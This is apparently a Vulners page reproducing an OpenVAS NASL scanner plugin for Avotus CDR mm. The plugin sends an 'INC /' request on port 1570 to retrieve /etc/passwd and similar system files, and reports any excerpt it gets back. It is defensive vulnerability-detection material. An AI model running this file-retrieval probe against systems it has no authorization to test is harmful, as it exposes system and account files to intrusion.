Lucene search
+L

Avotus CDR mm File Retrieval Attempt

🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2004 AnonymousType 
openvas
 openvas
🔗 plugins.openvas.org👁 20 Views

Avotus CDR mm File Retrieval Attempt. Remote file access to the Avotus CDR mm service on port 1570 attempts to retrieve the file /etc/passwd

Code
# SPDX-FileCopyrightText: 2004 Anonymous
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.11948");
  script_version("2025-04-15T05:54:49+0000");
  script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"6.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_name("Avotus CDR mm File Retrieval Attempt");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2004 Anonymous");
  script_family("Remote file access");
  script_dependencies("find_service.nasl", "os_detection.nasl");
  script_require_ports("Services/avotus_mm", 1570);
  script_mandatory_keys("Host/runs_unixoide");

  script_tag(name:"solution", value:"The vendor has provided a fix for this issue to all customers.
  The fix will be included in future shipments and future versions of the product. If an Avotus
  customer has any questions about this problem, they should contact [email protected].");

  script_tag(name:"summary", value:"The script attempts to force the remote Avotus CDR mm service to
  include the file /etc/passwd across the network.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

include("host_details.inc");
include("os_func.inc");
include("misc_func.inc");
include("traversal_func.inc");
include("port_service_func.inc");

port = service_get_port(default:1570, proto:"avotus_mm");

soc = open_sock_tcp(port);
if(!soc) exit(0);

files = traversal_files("linux");

foreach pattern(keys(files)) {

  file = files[pattern];

  send(socket:soc, data:"INC /" + file + "\n");
  res = recv(socket:soc, length:65535);
  if(egrep(pattern:pattern, string:res)) {
    close(soc);
    report  = "The Avotus CDR mm service allows any file to be retrieved remotely.";
    report += ' Here is an excerpt from the remote "/' + file + '" file :\n\n' +res;
    security_message(port:port, data:report);
    exit(0);
  }
}

close(soc);
exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2025 00:00Current
7.3High risk
Vulners AI Score7.3
20